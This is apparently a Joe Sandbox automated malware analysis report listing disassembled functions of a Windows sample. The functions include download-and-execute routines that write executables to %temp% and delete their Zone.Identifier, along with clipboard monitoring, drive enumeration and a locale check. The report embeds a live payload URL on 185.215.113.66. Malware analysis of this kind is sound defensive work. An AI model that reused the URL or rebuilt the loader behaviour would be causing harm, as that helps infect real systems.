API String ID: 4063137541-1705189816
Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A

Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
strcmp.NTDLL ref: 0040F1D2

Strings

UKR, xrefs: 0040F1C9

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA

Function 0040F560 Relevance: 73.7, APIs: 36, Strings: 6, Instructions: 231
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040F569
srand.MSVCRT ref: 0040F570
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
strlen.NTDLL ref: 0040F59A
mbstowcs.NTDLL ref: 0040F5B1
rand.MSVCRT ref: 0040F5B9
rand.MSVCRT ref: 0040F5CD
wsprintfW.USER32 ref: 0040F5F4
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
wsprintfW.USER32 ref: 0040F6F4
DeleteFileW.KERNEL32(?), ref: 0040F704
Sleep.KERNEL32(000003E8), ref: 0040F70F
Sleep.KERNEL32(000007D0), ref: 0040F730
ExitProcess.KERNEL32 ref: 0040F758
DeleteFileW.KERNEL32(?), ref: 0040F76E
CloseHandle.KERNEL32(000000FF), ref: 0040F77B
InternetCloseHandle.WININET(00000000), ref: 0040F788
InternetCloseHandle.WININET(00000000), ref: 0040F795
Sleep.KERNEL32(000003E8), ref: 0040F7A0
rand.MSVCRT ref: 0040F7B5
Sleep.KERNEL32 ref: 0040F7C6
rand.MSVCRT ref: 0040F7CC
rand.MSVCRT ref: 0040F7E0
wsprintfW.USER32 ref: 0040F807
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
wsprintfW.USER32 ref: 0040F844
DeleteFileW.KERNEL32(?), ref: 0040F854
Sleep.KERNEL32(000003E8), ref: 0040F85F
Sleep.KERNEL32(000007D0), ref: 0040F880
ExitProcess.KERNEL32 ref: 0040F8A7
DeleteFileW.KERNEL32(?), ref: 0040F8B6

Strings

%temp%, xrefs: 0040F58B
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F605
%s\%d%d.exe, xrefs: 0040F5E8
%s:Zone.Identifier, xrefs: 0040F838
%s\%d%d.exe, xrefs: 0040F7FB
%s:Zone.Identifier, xrefs: 0040F6E8

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 1632876846-2803014298
Opcode ID: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
Opcode Fuzzy Hash: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69

Function 004064A0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 111
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004064A9
srand.MSVCRT ref: 004064B0
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
rand.MSVCRT ref: 004064D6
rand.MSVCRT ref: 004064EA
wsprintfW.USER32 ref: 0040650F
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
CloseHandle.KERNEL32(000000FF), ref: 004065F2
wsprintfW.USER32 ref: 00406609
DeleteFileW.KERNEL32(?), ref: 00406619
CloseHandle.KERNEL32(000000FF), ref: 0040662D
InternetCloseHandle.WININET(00000000), ref: 0040663A
InternetCloseHandle.WININET(00000000), ref: 00406647

Strings

http://185.215.113.66/tdrp.exe, xrefs: 00406546
%s:Zone.Identifier, xrefs: 004065FD
%temp%, xrefs: 004064CB
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
%s\%d%d.exe, xrefs: 00406505

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
API String ID: 2816847299-853099633
Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28

Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE

strcmp.NTDLL ref: 0040B880

Strings

0.0.0.0, xrefs: 0040B86E
10., xrefs: 0040B94F
127., xrefs: 0040B891
.127, xrefs: 0040B8AF
.127., xrefs: 0040B8CD
.10., xrefs: 0040B98B
.192., xrefs: 0040B92C
.10, xrefs: 0040B96D
192., xrefs: 0040B8F0
.192, xrefs: 0040B90E

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138
networksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

PCOI, xrefs: 0040198A
ilci, xrefs: 004019E1

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99

Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040EF98
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
InternetCloseHandle.WININET(00000000), ref: 0040F181
InternetCloseHandle.WININET(00000000), ref: 0040F18E
InternetCloseHandle.WININET(00000000), ref: 0040F19B

Strings

Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040EFF6
<, xrefs: 0040EFA0
POST, xrefs: 0040F05E

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54

Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004059BC
SetClipboardViewer.USER32(?), ref: 00405A08
SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
OpenClipboard.USER32(00000000), ref: 00405AB7
GetClipboardData.USER32(00000000), ref: 00405AC9
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
ChangeClipboardChain.USER32(?,?), ref: 00405BDE
DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

ilci, xrefs: 00401630
PCOI, xrefs: 0040160D

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci
API String ID: 2403999931-3762367603
Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98

Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 004058D8
GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
Sleep.KERNEL32(00000001), ref: 00405904
GetTickCount.KERNEL32 ref: 0040590A
GetTickCount.KERNEL32 ref: 00405913
wsprintfW.USER32 ref: 00405926
RegisterClassExW.USER32(00000030), ref: 00405933
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
TranslateMessage.USER32(?), ref: 00405985
DispatchMessageA.USER32(?), ref: 0040598F
ExitThread.KERNEL32 ref: 004059A1

Strings

0, xrefs: 004058E0
%x%X, xrefs: 0040591A

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69

Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040E668
InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
InternetCloseHandle.WININET(00000000), ref: 0040E837
InternetCloseHandle.WININET(00000000), ref: 0040E844
InternetCloseHandle.WININET(00000000), ref: 0040E851

Strings

GET, xrefs: 0040E72B
<, xrefs: 0040E670

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54

Function 00406F70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00406F7E
GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90

Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232

ExitThread.KERNEL32 ref: 004070FA

Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E

Sleep.KERNEL32(000007D0), ref: 004070ED

Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
wsprintfW.USER32 ref: 00407072
wsprintfW.USER32 ref: 00407092
wsprintfW.USER32 ref: 004070B5

Strings

%s%s, xrefs: 004070A9
(%dGB), xrefs: 00407066
Unnamed volume, xrefs: 00407086

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$Unnamed volume
API String ID: 1650488544-2117135753
Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A

Function 0040F240 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
memcmp.NTDLL ref: 0040F35D
UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
CloseHandle.KERNEL32(00000000), ref: 0040F38A
CloseHandle.KERNEL32(000000FF), ref: 0040F394
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
CloseHandle.KERNEL32(000000FF), ref: 0040F3E2

Memory Dump Source

